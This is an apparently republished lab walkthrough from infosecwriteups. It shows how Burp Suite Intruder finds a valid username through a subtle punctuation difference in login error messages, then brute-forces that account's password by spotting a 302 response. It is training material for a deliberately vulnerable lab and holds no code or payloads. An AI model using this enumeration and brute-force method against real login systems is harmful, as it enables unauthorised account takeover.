Authentication Vulnerabilities- Lab #4 Username enumeration via subtly different responses
2023-12-11 11:50:2 Author: infosecwriteups.com(查看原文) 阅读量:4 收藏

Lets use a random credentials to login and watch the response.

Ok. Points to be noted.

Lets fire up burpsuite.

Send the request to Intruder Ctrl + I

In intruder:
- First clear the payloads
- Select the username and click on Add
- Make sure attack type is sniper

Now go to payloads section:
- Set Payload type simple list
- And paste the username list ( username and password wordlist is given in lab)
- Click Start attack

In the result. I tried looking for changes in different Lengths, but I was unable to spot any differences. Copy the status we get after entering Invalid credential. Invalid username and password.

Lets use this line of text to filter out out response. Incase of valid username we might get different response. We might get Incorrect password as response. Lets see what happens.

Paste the copied text and click on Negative search .
Why Negative search? Negative search gives the result which doesnot match the entered text. And that is what we need.

And this is one response. Lets check it
In render view it is still giving same Invalid username and password error.
So how is this different?
If you look at this response closely. It is missing .
When the username was incorrect, we were displayed Invalid username and password. (have full stop) but in this case it is only displaying Invalid username and password (don’t have full stop).

You can use comparer tool to compare to response and find the differences more clearly

Ok, now we have got a valid username.
Lets find the password.

Go back to intruder:
- Clear the payload position
- Change the username to the one we just found
- and select password and click add

In payloads option
- click clear to remove previous username payloads
- copy the password payload from lab and paste
- and start the attack

and we got the result

All other result have status 200 except one has 302
which should be the password.

lets try to login

And we solved the lab


文章来源: https://infosecwriteups.com/authentication-vulnerabilities-lab-4-username-enumeration-via-subtly-different-responses-5eb512d899fa?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh